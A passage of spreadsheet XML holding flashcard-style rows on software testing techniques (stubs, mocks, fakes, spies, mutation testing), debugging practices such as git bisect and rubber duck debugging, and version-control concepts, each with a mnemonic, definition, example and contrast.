      </c>
      <c r="K912" t="inlineStr">
        <is>
          <t>Test techniques</t>
        </is>
      </c>
    </row>
    <row r="913">
      <c r="A913" t="n">
        <v>0</v>
      </c>
      <c r="B913" t="inlineStr">
        <is>
          <t>911</t>
        </is>
      </c>
      <c r="C913" t="inlineStr">
        <is>
          <t>Red-green-refactor</t>
        </is>
      </c>
      <c r="D913" t="inlineStr">
        <is>
          <t>A traffic light stuck on a loop: RED halts you at a failing test, GREEN means the minimal code drove through, then a yellow refactor lap polishes the car before the light turns red again.</t>
        </is>
      </c>
      <c r="E913" t="inlineStr">
        <is>
          <t>TDD's micro-cycle: watch the new test fail (red), write minimal code to pass (green), then clean up with the tests standing guard.</t>
        </is>
      </c>
      <c r="F913" t="inlineStr">
        <is>
          <t>red: assert slug('A B') == 'a-b' fails / green: return s.lower().replace(' ', '-') / refactor: extract, rename - still green</t>
        </is>
      </c>
      <c r="G913" t="inlineStr">
        <is>
          <t>Debugging cycle - red here is deliberate and expected before the code exists, not an accident to investigate.</t>
        </is>
      </c>
      <c r="H913" t="inlineStr">
        <is>
          <t>A heartbeat rhythm: fail, pass, clean, repeat.</t>
        </is>
      </c>
      <c r="J913" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K913" t="inlineStr">
        <is>
          <t>Test techniques</t>
        </is>
      </c>
    </row>
    <row r="914">
      <c r="A914" t="n">
        <v>0</v>
      </c>
      <c r="B914" t="inlineStr">
        <is>
          <t>912</t>
        </is>
      </c>
      <c r="C914" t="inlineStr">
        <is>
          <t>Stub</t>
        </is>
      </c>
      <c r="D914" t="inlineStr">
        <is>
          <t>A movie ticket STUB torn off at the door: pre-printed with one fixed answer, 'Seat 12F', no matter what question you ask the usher.</t>
        </is>
      </c>
      <c r="E914" t="inlineStr">
        <is>
          <t>A test double that returns canned answers to calls, supplying indirect input; it verifies nothing itself.</t>
        </is>
      </c>
      <c r="F914" t="inlineStr">
        <is>
          <t>stub_rates.get('EUR') -&gt; always 1.08 / test asserts only on the converter's output</t>
        </is>
      </c>
      <c r="G914" t="inlineStr">
        <is>
          <t>Mock - a mock also asserts WHICH calls it received; a stub just feeds answers and is never verified.</t>
        </is>
      </c>
      <c r="H914" t="inlineStr">
        <is>
          <t>A cardboard cutout with one speech bubble.</t>
        </is>
      </c>
      <c r="J914" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K914" t="inlineStr">
        <is>
          <t>Test techniques</t>
        </is>
      </c>
    </row>
    <row r="915">
      <c r="A915" t="n">
        <v>0</v>
      </c>
      <c r="B915" t="inlineStr">
        <is>
          <t>913</t>
        </is>
      </c>
      <c r="C915" t="inlineStr">
        <is>
          <t>Mock</t>
        </is>
      </c>
      <c r="D915" t="inlineStr">
        <is>
          <t>A MOCK trial where the fake witness holds a script AND a checklist: afterward the judge fails you if you did not ask the expected questions.</t>
        </is>
      </c>
      <c r="E915" t="inlineStr">
        <is>
          <t>A test double pre-programmed with expected calls; the test passes or fails on whether the interaction happened as specified.</t>
        </is>
      </c>
      <c r="F915" t="inlineStr">
        <is>
          <t>mailer = Mock() / service.register(user) / mailer.send.assert_called_once_with(user.email)</t>
        </is>
      </c>
      <c r="G915" t="inlineStr">
        <is>
          <t>Stub - stubs feed data in (state verification); mocks assert on the calls made (behavior verification).</t>
        </is>
      </c>
      <c r="H915" t="inlineStr">
        <is>
          <t>A drill sergeant grading you on the orders you gave.</t>
        </is>
      </c>
      <c r="J915" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K915" t="inlineStr">
        <is>
          <t>Test techniques</t>
        </is>
      </c>
    </row>
    <row r="916">
      <c r="A916" t="n">
        <v>0</v>
      </c>
      <c r="B916" t="inlineStr">
        <is>
          <t>914</t>
        </is>
      </c>
      <c r="C916" t="inlineStr">
        <is>
          <t>Fake</t>
        </is>
      </c>
      <c r="D916" t="inlineStr">
        <is>
          <t>A street-market FAKE Rolex: it truly ticks and tells the time - a real working mechanism - it's just cheap plastic inside. An in-memory store, not Postgres.</t>
        </is>
      </c>
      <c r="E916" t="inlineStr">
        <is>
          <t>A lightweight but genuinely working implementation used in tests, like an in-memory database - real behavior, unfit for production.</t>
        </is>
      </c>
      <c r="F916" t="inlineStr">
        <is>
          <t>class InMemoryRepo: dict-backed save/find / tests run in milliseconds, no real DB / same interface as the production repo</t>
        </is>
      </c>
      <c r="G916" t="inlineStr">
        <is>
          <t>Stub - a fake has real working logic; a stub only replays hardcoded answers.</t>
        </is>
      </c>
      <c r="H916" t="inlineStr">
        <is>
          <t>A toy kitchen that really cooks tiny meals.</t>
        </is>
      </c>
      <c r="J916" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K916" t="inlineStr">
        <is>
          <t>Test techniques</t>
        </is>
      </c>
    </row>
    <row r="917">
      <c r="A917" t="n">
        <v>0</v>
      </c>
      <c r="B917" t="inlineStr">
        <is>
          <t>915</t>
        </is>
      </c>
      <c r="C917" t="inlineStr">
        <is>
          <t>Spy</t>
        </is>
      </c>
      <c r="D917" t="inlineStr">
        <is>
          <t>A SPY wiretaps the phone line: the real conversation goes through untouched, but every word is recorded for inspection after the call ends.</t>
        </is>
      </c>
      <c r="E917" t="inlineStr">
        <is>
          <t>A test double, often wrapping the real object, that records calls for later inspection while letting behavior proceed.</t>
        </is>
      </c>
      <c r="F917" t="inlineStr">
        <is>
          <t>spy = spy_on(logger) / service.run() / assert spy.calls[0].args == ('started',)</t>
        </is>
      </c>
      <c r="G917" t="inlineStr">
        <is>
          <t>Mock - a mock fails on unexpected interactions by upfront contract; a spy just records, and you assert afterwards.</t>
        </is>
      </c>
      <c r="H917" t="inlineStr">
        <is>
          <t>A flight recorder riding quietly along.</t>
        </is>
      </c>
      <c r="J917" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K917" t="inlineStr">
        <is>
          <t>Test techniques</t>
        </is>
      </c>
    </row>
    <row r="918">
      <c r="A918" t="n">
        <v>0</v>
      </c>
      <c r="B918" t="inlineStr">
        <is>
          <t>916</t>
        </is>
      </c>
      <c r="C918" t="inlineStr">
        <is>
          <t>Property-based testing</t>
        </is>
      </c>
      <c r="D918" t="inlineStr">
        <is>
          <t>Instead of tasting three cookies, a factory robot bakes 10,000 random cookies and checks one law: none may leave the oven raw. It hands you the SMALLEST raw cookie it found.</t>
        </is>
      </c>
      <c r="E918" t="inlineStr">
        <is>
          <t>Generate hundreds of random inputs and check an invariant holds for all, shrinking any failure to a minimal counterexample.</t>
        </is>
      </c>
      <c r="F918" t="inlineStr">
        <is>
          <t>@given(st.lists(st.integers())) / def test(xs): assert rev(rev(xs)) == xs / hypothesis shrinks any failure to minimal xs</t>
        </is>
      </c>
      <c r="G918" t="inlineStr">
        <is>
          <t>Fuzzing - fuzzing hunts crashes on arbitrary input; property tests check stated invariants and shrink counterexamples.</t>
        </is>
      </c>
      <c r="H918" t="inlineStr">
        <is>
          <t>A thousand monkeys typing inputs while one law is enforced.</t>
        </is>
      </c>
      <c r="J918" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K918" t="inlineStr">
        <is>
          <t>Test techniques</t>
        </is>
      </c>
    </row>
    <row r="919">
      <c r="A919" t="n">
        <v>0</v>
      </c>
      <c r="B919" t="inlineStr">
        <is>
          <t>917</t>
        </is>
      </c>
      <c r="C919" t="inlineStr">
        <is>
          <t>Snapshot testing</t>
        </is>
      </c>
      <c r="D919" t="inlineStr">
        <is>
          <t>A night guard holds yesterday's Polaroid up against today's room: any moved chair trips the alarm - even the chair you moved on purpose.</t>
        </is>
      </c>
      <c r="E919" t="inlineStr">
        <is>
          <t>Capture a rendered output once, then fail whenever new output differs from the stored snapshot; changes need explicit re-approval.</t>
        </is>
      </c>
      <c r="F919" t="inlineStr">
        <is>
          <t>expect(render(&lt;Card/&gt;)).toMatchSnapshot() / diff shown on any change / jest -u accepts the new picture</t>
        </is>
      </c>
      <c r="G919" t="inlineStr">
        <is>
          <t>Assertion tests - snapshots pin the entire output blob; assertions pin chosen, meaningful properties.</t>
        </is>
      </c>
      <c r="H919" t="inlineStr">
        <is>
          <t>A spot-the-difference puzzle against yesterday's page.</t>
        </is>
      </c>
      <c r="J919" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K919" t="inlineStr">
        <is>
          <t>Test techniques</t>
        </is>
      </c>
    </row>
    <row r="920">
      <c r="A920" t="n">
        <v>0</v>
      </c>
      <c r="B920" t="inlineStr">
        <is>
          <t>918</t>
        </is>
      </c>
      <c r="C920" t="inlineStr">
        <is>
          <t>Coverage limits</t>
        </is>
      </c>
      <c r="D920" t="inlineStr">
        <is>
          <t>A museum guard 'covers' the building by strolling every corridor - 100% of hallways walked - while never once checking whether a single painting is genuine.</t>
        </is>
      </c>
      <c r="E920" t="inlineStr">
        <is>
          <t>Coverage shows which lines ran, not which behaviors were verified; 100% coverage with weak asserts proves nothing.</t>
        </is>
      </c>
      <c r="F920" t="inlineStr">
        <is>
          <t>test calls process(order) with no asserts / coverage: 100%; bugs caught: 0 / coverage finds UNtested code, not tested code</t>
        </is>
      </c>
      <c r="G920" t="inlineStr">
        <is>
          <t>Mutation score - mutation testing measures whether tests detect changes; coverage only measures execution.</t>
        </is>
      </c>
      <c r="H920" t="inlineStr">
        <is>
          <t>A blanket covering the bed without warming it.</t>
        </is>
      </c>
      <c r="J920" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K920" t="inlineStr">
        <is>
          <t>Test techniques</t>
        </is>
      </c>
    </row>
    <row r="921">
      <c r="A921" t="n">
        <v>0</v>
      </c>
      <c r="B921" t="inlineStr">
        <is>
          <t>919</t>
        </is>
      </c>
      <c r="C921" t="inlineStr">
        <is>
          <t>Mutation testing</t>
        </is>
      </c>
      <c r="D921" t="inlineStr">
        <is>
          <t>A gremlin sneaks in at night flipping plus signs to minus in the vault's code; if the alarm system (your test suite) stays silent, your alarms are decorative.</t>
        </is>
      </c>
      <c r="E921" t="inlineStr">
        <is>
          <t>A tool mutates your code - flips &lt;, deletes calls - and every mutant your suite fails to kill exposes an assertion gap.</t>
        </is>
      </c>
      <c r="F921" t="inlineStr">
        <is>
          <t>mutmut run (or Stryker for JS) / mutant survived: 'a &lt;= b' -&gt; 'a &lt; b' / add a boundary test to kill it</t>
        </is>
      </c>
      <c r="G921" t="inlineStr">
        <is>
          <t>Chaos engineering - chaos perturbs the running system; mutation testing perturbs source code to grade the tests.</t>
        </is>
      </c>
      <c r="H921" t="inlineStr">
        <is>
          <t>A sabotage drill that grades the alarm system.</t>
        </is>
      </c>
      <c r="J921" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K921" t="inlineStr">
        <is>
          <t>Test techniques</t>
        </is>
      </c>
    </row>
    <row r="922">
      <c r="A922" t="n">
        <v>0</v>
      </c>
      <c r="B922" t="inlineStr">
        <is>
          <t>920</t>
        </is>
      </c>
      <c r="C922" t="inlineStr">
        <is>
          <t>Read the error message</t>
        </is>
      </c>
      <c r="D922" t="inlineStr">
        <is>
          <t>A driver ignores the dashboard text 'FUEL CAP OPEN - LEFT SIDE' and dismantles the engine instead. The bug's name, file, and line were printed on line one.</t>
        </is>
      </c>
      <c r="E922" t="inlineStr">
        <is>
          <t>Errors usually name the problem, file, and line; read the full message and the first relevant stack frame before theorizing.</t>
        </is>
      </c>
      <c r="F922" t="inlineStr">
        <is>
          <t>TypeError: cannot read 'id' of undefined / at orders.js:42 / -&gt; user is undefined at line 42; start there</t>
        </is>
      </c>
      <c r="G922" t="inlineStr">
        <is>
          <t>Skimming the stack trace - find the deepest frame in YOUR code; framework frames around it are usually noise.</t>
        </is>
      </c>
      <c r="H922" t="inlineStr">
        <is>
          <t>A treasure map printed on the ransom note itself.</t>
        </is>
      </c>
      <c r="J922" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K922" t="inlineStr">
        <is>
          <t>Debugging</t>
        </is>
      </c>
    </row>
    <row r="923">
      <c r="A923" t="n">
        <v>0</v>
      </c>
      <c r="B923" t="inlineStr">
        <is>
          <t>921</t>
        </is>
      </c>
      <c r="C923" t="inlineStr">
        <is>
          <t>Reproduce first</t>
        </is>
      </c>
      <c r="D923" t="inlineStr">
        <is>
          <t>A detective refuses to name a suspect until she can re-stage the crime on command: same room, same knife, same failure, ten times out of ten.</t>
        </is>
      </c>
      <c r="E923" t="inlineStr">
        <is>
          <t>Make the bug happen on demand before attempting any fix; an unreproduced bug can never be verified as fixed.</t>
        </is>
      </c>
      <c r="F923" t="inlineStr">
        <is>
          <t>repro.sh fails 10/10 runs / after the fix: 0/10 / no repro yet? add logging and wait for recurrence</t>
        </is>
      </c>
      <c r="G923" t="inlineStr">
        <is>
          <t>Fixing by plausible theory - without a repro you cannot distinguish 'fixed' from 'stopped looking'.</t>
        </is>
      </c>
      <c r="H923" t="inlineStr">
        <is>
          <t>A ghost you must summon on command before exorcising it.</t>
        </is>
      </c>
      <c r="J923" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K923" t="inlineStr">
        <is>
          <t>Debugging</t>
        </is>
      </c>
    </row>
    <row r="924">
      <c r="A924" t="n">
        <v>0</v>
      </c>
      <c r="B924" t="inlineStr">
        <is>
          <t>922</t>
        </is>
      </c>
      <c r="C924" t="inlineStr">
        <is>
          <t>Minimal failing case</t>
        </is>
      </c>
      <c r="D924" t="inlineStr">
        <is>
          <t>Keep halving the haystack: if the needle still pricks, throw away the other half. You end up holding ten straws and one gleaming needle - a ten-line repro.</t>
        </is>
      </c>
      <c r="E924" t="inlineStr">
        <is>
          <t>Repeatedly delete or simplify parts of a failing case, keeping it failing, until only the essence of the bug remains.</t>
        </is>
      </c>
      <c r="F924" t="inlineStr">
        <is>
          <t>5,000-line page fails -&gt; delete half, still fails / repeat until 8 lines of HTML still break layout / the bug report IS those 8 lines</t>
        </is>
      </c>
      <c r="G924" t="inlineStr">
        <is>
          <t>Reproduce first - reproduction makes it happen at all; minimization shrinks it to the smallest trigger.</t>
        </is>
      </c>
      <c r="H924" t="inlineStr">
        <is>
          <t>Boiling the ocean down to one salty drop.</t>
        </is>
      </c>
      <c r="J924" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K924" t="inlineStr">
        <is>
          <t>Debugging</t>
        </is>
      </c>
    </row>
    <row r="925">
      <c r="A925" t="n">
        <v>0</v>
      </c>
      <c r="B925" t="inlineStr">
        <is>
          <t>923</t>
        </is>
      </c>
      <c r="C925" t="inlineStr">
        <is>
          <t>Hypothesis-driven debugging</t>
        </is>
      </c>
      <c r="D925" t="inlineStr">
        <is>
          <t>A scientist in a lab coat writes 'I bet the cache is stale' in her notebook, designs ONE experiment to kill the guess, and crosses it off - never poking at random.</t>
        </is>
      </c>
      <c r="E925" t="inlineStr">
        <is>
          <t>Debug scientifically: state one testable guess, design an observation to falsify it, and let each result prune the search space.</t>
        </is>
      </c>
      <c r="F925" t="inlineStr">
        <is>
          <t>H: cache serves stale config / experiment: bypass cache -&gt; bug persists / H rejected; write the next hypothesis</t>
        </is>
      </c>
      <c r="G925" t="inlineStr">
        <is>
          <t>Shotgun debugging - changing many things at once; if it stops failing you have learned nothing about why.</t>
        </is>
      </c>
      <c r="H925" t="inlineStr">
        <is>
          <t>A detective's corkboard, one thread tugged at a time.</t>
        </is>
      </c>
      <c r="J925" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K925" t="inlineStr">
        <is>
          <t>Debugging</t>
        </is>
      </c>
    </row>
    <row r="926">
      <c r="A926" t="n">
        <v>0</v>
      </c>
      <c r="B926" t="inlineStr">
        <is>
          <t>924</t>
        </is>
      </c>
      <c r="C926" t="inlineStr">
        <is>
          <t>Git bisect</t>
        </is>
      </c>
      <c r="D926" t="inlineStr">
        <is>
          <t>A librarian hunts the page where a novel turns bad: open at the middle, ask 'good or bad?', discard half. A thousand commits interrogated in ten questions.</t>
        </is>
      </c>
      <c r="E926" t="inlineStr">
        <is>
          <t>Binary-search history (or a failing input): test the midpoint, discard the good half, converge on the culprit in log2(n) steps.</t>
        </is>
      </c>
      <c r="F926" t="inlineStr">
        <is>
          <t>git bisect start / git bisect bad HEAD; git bisect good v2.1 / ~10 checkouts pinpoint the guilty commit</t>
        </is>
      </c>
      <c r="G926" t="inlineStr">
        <is>
          <t>git blame - blame shows who last touched a line; bisect finds WHICH commit changed the behavior.</t>
        </is>
      </c>
      <c r="H926" t="inlineStr">
        <is>
          <t>Twenty questions played against commit history.</t>
        </is>
      </c>
      <c r="J926" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K926" t="inlineStr">
        <is>
          <t>Debugging</t>
        </is>
      </c>
    </row>
    <row r="927">
      <c r="A927" t="n">
        <v>0</v>
      </c>
      <c r="B927" t="inlineStr">
        <is>
          <t>925</t>
        </is>
      </c>
      <c r="C927" t="inlineStr">
        <is>
          <t>Breakpoint debugging</t>
        </is>
      </c>
      <c r="D927" t="inlineStr">
        <is>
          <t>You yell FREEZE and the program stops mid-stride like a paused film; you stroll among the frozen variables reading their name tags, then advance one frame at a time.</t>
        </is>
      </c>
      <c r="E927" t="inlineStr">
        <is>
          <t>Pause execution at a chosen line to inspect live state, then step through the code watching variables change.</t>
        </is>
      </c>
      <c r="F927" t="inlineStr">
        <is>
          <t>breakpoint() # Python / step over / step into, inspect locals / conditional: break only if order.total &lt; 0</t>
        </is>
      </c>
      <c r="G927" t="inlineStr">
        <is>
          <t>Log debugging - logs record after the fact across runs; breakpoints inspect one live moment interactively.</t>
        </is>
      </c>
      <c r="H927" t="inlineStr">
        <is>
          <t>The world on pause while you walk among statues.</t>
        </is>
      </c>
      <c r="J927" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K927" t="inlineStr">
        <is>
          <t>Debugging</t>
        </is>
      </c>
    </row>
    <row r="928">
      <c r="A928" t="n">
        <v>0</v>
      </c>
      <c r="B928" t="inlineStr">
        <is>
          <t>926</t>
        </is>
      </c>
      <c r="C928" t="inlineStr">
        <is>
          <t>Log debugging</t>
        </is>
      </c>
      <c r="D928" t="inlineStr">
        <is>
          <t>A ship's captain logs 'lat, lon, fuel level' at each waypoint - not 'HERE!!!' scrawled five hundred times. Reading the trail later shows exactly where the course bent.</t>
        </is>
      </c>
      <c r="E928" t="inlineStr">
        <is>
          <t>Strategic prints with labels, values, and timestamps at decision points trace the actual path; then remove or demote them.</t>
        </is>
      </c>
      <c r="F928" t="inlineStr">
        <is>
          <t>log.debug('retry', attempt=n, delay=d) / not: print('here!!!') pasted 30 times / bracket the suspect call: log before and after</t>
        </is>
      </c>
      <c r="G928" t="inlineStr">
        <is>
          <t>Structured production logging - that is permanent telemetry; debug logging is a temporary scalpel for one hunt.</t>
        </is>
      </c>
      <c r="H928" t="inlineStr">
        <is>
          <t>A breadcrumb trail with labeled crumbs.</t>
        </is>
      </c>
      <c r="J928" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K928" t="inlineStr">
        <is>
          <t>Debugging</t>
        </is>
      </c>
    </row>
    <row r="929">
      <c r="A929" t="n">
        <v>0</v>
      </c>
      <c r="B929" t="inlineStr">
        <is>
          <t>927</t>
        </is>
      </c>
      <c r="C929" t="inlineStr">
        <is>
          <t>Rubber duck debugging</t>
        </is>
      </c>
      <c r="D929" t="inlineStr">
        <is>
          <t>You explain the bug line by line to a bath duck perched on the monitor; at line 14 you stop mid-sentence - saying it aloud exposed the flaw. The duck never spoke.</t>
        </is>
      </c>
      <c r="E929" t="inlineStr">
        <is>
          <t>Explaining the code line by line out loud - even to a toy - forces a precision that reveals the flawed assumption.</t>
        </is>
      </c>
      <c r="F929" t="inlineStr">
        <is>
          <t>'It fetches the user... wait. / It fetches BEFORE the session exists.' / Case closed; the duck stays silent.</t>
        </is>
      </c>
      <c r="G929" t="inlineStr">
        <is>
          <t>Pair programming - a pair talks back; the duck works because articulation alone exposes the gap.</t>
        </is>
      </c>
      <c r="H929" t="inlineStr">
        <is>
          <t>A confessional booth for code.</t>
        </is>
      </c>
      <c r="J929" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K929" t="inlineStr">
        <is>
          <t>Debugging</t>
        </is>
      </c>
    </row>
    <row r="930">
      <c r="A930" t="n">
        <v>0</v>
      </c>
      <c r="B930" t="inlineStr">
        <is>
          <t>928</t>
        </is>
      </c>
      <c r="C930" t="inlineStr">
        <is>
          <t>Heisenbug</t>
        </is>
      </c>
      <c r="D930" t="inlineStr">
        <is>
          <t>A bug that hides when watched: attach the debugger and the timing shifts, so the race dissolves - like a mouse that only scurries while the kitchen light is OFF.</t>
        </is>
      </c>
      <c r="E930" t="inlineStr">
        <is>
          <t>A bug that changes or vanishes under observation - debuggers, prints, or timing shifts perturb the race or UB causing it.</t>
        </is>
      </c>
      <c r="F930" t="inlineStr">
        <is>
          <t>crash disappears when printf is added / the log call itself changes thread timing / tools: record/replay (rr), TSan, core dumps</t>
        </is>
      </c>
      <c r="G930" t="inlineStr">
        <is>
          <t>Flaky test - flakiness is nondeterminism anywhere; a heisenbug specifically hides when observed.</t>
        </is>
      </c>
      <c r="H930" t="inlineStr">
        <is>
          <t>Schroedinger's bug, alive until you look.</t>
        </is>
      </c>
      <c r="J930" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K930" t="inlineStr">
        <is>
          <t>Debugging</t>
        </is>
      </c>
    </row>
    <row r="931">
      <c r="A931" t="n">
        <v>0</v>
      </c>
      <c r="B931" t="inlineStr">
        <is>
          <t>929</t>
        </is>
      </c>
      <c r="C931" t="inlineStr">
        <is>
          <t>Fix cause, not symptom</t>
        </is>
      </c>
      <c r="D931" t="inlineStr">
        <is>
          <t>A landlord repaints the damp ceiling stain every month; the ceiling still collapses, because the leaking pipe above it was never touched.</t>
        </is>
      </c>
      <c r="E931" t="inlineStr">
        <is>
          <t>Trace the failure to its root cause before patching; silencing the symptom leaves the fault free to resurface elsewhere.</t>
        </is>
      </c>
      <c r="F931" t="inlineStr">
        <is>
          <t>symptom patch: if x is None: return / actual cause: registration never saved the user / ask 'why' down the chain until the mechanism is explained</t>
        </is>
      </c>
      <c r="G931" t="inlineStr">
        <is>
          <t>Workaround - fine as a labeled stopgap; it turns harmful when it masquerades as the fix.</t>
        </is>
      </c>
      <c r="H931" t="inlineStr">
        <is>
          <t>Mowing the weed instead of pulling its root.</t>
        </is>
      </c>
      <c r="J931" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K931" t="inlineStr">
        <is>
          <t>Debugging</t>
        </is>
      </c>
    </row>
    <row r="932">
      <c r="A932" t="n">
        <v>0</v>
      </c>
      <c r="B932" t="inlineStr">
        <is>
          <t>930</t>
        </is>
      </c>
      <c r="C932" t="inlineStr">
        <is>
          <t>Atomic commits</t>
        </is>
      </c>
      <c r="D932" t="inlineStr">
        <is>
          <t>Each commit is a single LEGO brick: one shape, one purpose, snaps in or pops out cleanly. Glue three bricks together and removing one rips out all three.</t>
        </is>
      </c>
      <c r="E932" t="inlineStr">
        <is>
          <t>One commit equals one complete logical change that builds and passes tests - easy to review, revert, and bisect.</t>
        </is>
      </c>
      <c r="F932" t="inlineStr">
        <is>
          <t>git add -p # stage one concern at a time / commit 1: extract price helper / commit 2: fix off-by-one using the helper</t>
        </is>
      </c>
      <c r="G932" t="inlineStr">
        <is>
          <t>Small commits - atomic means complete AND single-purpose; a tiny commit that breaks the build is not atomic.</t>
        </is>
      </c>
      <c r="H932" t="inlineStr">
        <is>
          <t>Atoms: indivisible, and splitting one causes an explosion.</t>
        </is>
      </c>
      <c r="J932" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K932" t="inlineStr">
        <is>
          <t>Version control &amp; Git</t>
        </is>
      </c>
    </row>
    <row r="933">
      <c r="A933" t="n">
        <v>0</v>
      </c>
      <c r="B933" t="inlineStr">
        <is>
          <t>931</t>
        </is>
      </c>
      <c r="C933" t="inlineStr">
        <is>
          <t>Commit messages</t>
        </is>
      </c>
      <c r="D933" t="inlineStr">
        <is>
          <t>Every commit is a postcard mailed to a stranger in 2031: the front says WHAT changed in one line; the back explains WHY. 'fix stuff' is a blank postcard.</t>
        </is>
      </c>
      <c r="E933" t="inlineStr">
        <is>
          <t>A short imperative summary line plus a body explaining WHY the change was made; the diff already shows the what.</t>
        </is>
      </c>
      <c r="F933" t="inlineStr">
        <is>
          <t>fix: reject expired tokens in refresh flow / / Refresh accepted tokens past exp because the check used issue time.</t>
        </is>
      </c>
      <c r="G933" t="inlineStr">
        <is>
          <t>Code comments - comments explain the current code; commit messages explain the change and its motivation.</t>
        </is>
      </c>
      <c r="H933" t="inlineStr">
        <is>
          <t>A message in a bottle for future maintainers.</t>
        </is>
      </c>
      <c r="J933" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K933" t="inlineStr">
        <is>
          <t>Version control &amp; Git</t>
        </is>
      </c>
    </row>
    <row r="934">
      <c r="A934" t="n">
        <v>0</v>
      </c>
      <c r="B934" t="inlineStr">
        <is>
          <t>932</t>
        </is>
      </c>
      <c r="C934" t="inlineStr">
        <is>
          <t>Branching</t>
        </is>
      </c>
      <c r="D934" t="inlineStr">
        <is>
          <t>Pull the railway switch and your train forks onto a parallel track: reshape the landscape freely while the mainline keeps running on schedule.</t>
        </is>
      </c>
      <c r="E934" t="inlineStr">
        <is>
          <t>A branch is a movable pointer to a commit, giving an isolated line of development that is cheap to create and discard.</t>
        </is>
      </c>
      <c r="F934" t="inlineStr">
        <is>
          <t>git switch -c fix/rate-limit / experiment freely; main stays releasable / git branch -d fix/rate-limit after merge</t>
        </is>
      </c>
      <c r="G934" t="inlineStr">
        <is>
          <t>Fork - a fork copies the whole repo to another owner; a branch is a pointer inside the same repo.</t>
        </is>
      </c>
      <c r="H934" t="inlineStr">
        <is>
          <t>A parallel universe spun up for one experiment.</t>
        </is>
      </c>
      <c r="J934" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K934" t="inlineStr">
        <is>
          <t>Version control &amp; Git</t>
        </is>
      </c>
    </row>
    <row r="935">
      <c r="A935" t="n">
        <v>0</v>
      </c>
      <c r="B935" t="inlineStr">
        <is>
          <t>933</t>
        </is>
      </c>
      <c r="C935" t="inlineStr">
        <is>
          <t>Merge</t>
        </is>
      </c>
      <c r="D935" t="inlineStr">
        <is>
          <t>Two rivers meet and flow on as one; standing at the confluence - the merge commit - you can still see both original riverbeds stretching behind you.</t>
        </is>
      </c>
      <c r="E935" t="inlineStr">
        <is>
          <t>Combines two branch histories with a merge commit that has both parents, preserving each branch's true history.</t>
        </is>
      </c>
      <c r="F935" t="inlineStr">
        <is>
          <t>git switch main / git merge feature / log shows a merge commit with two parents</t>
        </is>
      </c>
      <c r="G935" t="inlineStr">
        <is>
          <t>Rebase - merge preserves both histories joined by a commit; rebase rewrites commits onto a new base for a straight line.</t>
        </is>
      </c>
      <c r="H935" t="inlineStr">
        <is>
          <t>A zipper joining two tracks into one.</t>
        </is>
      </c>
      <c r="J935" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K935" t="inlineStr">
        <is>
          <t>Version control &amp; Git</t>
        </is>
      </c>
    </row>
    <row r="936">
      <c r="A936" t="n">
        <v>0</v>
      </c>
      <c r="B936" t="inlineStr">
        <is>
          <t>934</t>
        </is>
      </c>
      <c r="C936" t="inlineStr">
        <is>
          <t>Rebase</t>
        </is>
      </c>
      <c r="D936" t="inlineStr">
        <is>
          <t>A gardener uproots your branch and replants it atop today's trunk, regrowing each commit in order - the garden looks like you planted there all along. Tidy, and rewritten.</t>
        </is>
      </c>
      <c r="E936" t="inlineStr">
        <is>
          <t>Replays your commits one by one onto a new base, producing linear history with new hashes; never rewrite shared history.</t>
        </is>
      </c>
      <c r="F936" t="inlineStr">
        <is>
          <t>git switch feature / git rebase main / push only your own branch: --force-with-lease</t>
        </is>
      </c>
      <c r="G936" t="inlineStr">
        <is>
          <t>Merge - rebase rewrites your commits with new hashes; merge adds one commit and changes nothing that existed.</t>
        </is>
      </c>
      <c r="H936" t="inlineStr">
        <is>
          <t>A cassette re-recorded onto a fresh tape.</t>
        </is>
      </c>
      <c r="J936" t="inlineStr">
        <is>
          <t>Quality, security &amp; operations</t>
        </is>
      </c>
      <c r="K936" t="inlineStr">
        <is>
          <t>Version control &amp; Git</t>
        </is>
      </c>
    </row>
    <row r="937">
      <c r="A937" t="n">
        <v>0</v>
      </c>
      <c r="B937" t="inlineStr">
        <is>
          <t>935</t>
        </is>
      </c>
      <c r="C937" t="inlineStr">
        <is>
          <t>Pull requests &amp; review</t>
        </is>
      </c>
      <c r="D937" t="inlineStr">
        <is>
          <t>Your code queues at customs: an officer opens the suitcase (the diff), asks questions in the margins, and only stamps MERGE once you have repacked it.</t>
        </is>
      </c>
      <c r="E937" t="inlineStr">
        <is>
          <t>Propose a branch for merging so peers review the diff, discuss in comments, and require checks to pass before it enters main.</t>
        </is>
      </c>
      <c r="F937" t="inlineStr">
        <is>
          <t>gh pr create --fill / reviewer comments on lines; author pushes fixes / CI green + approval -&gt; merge</t>
        </is>
      </c>
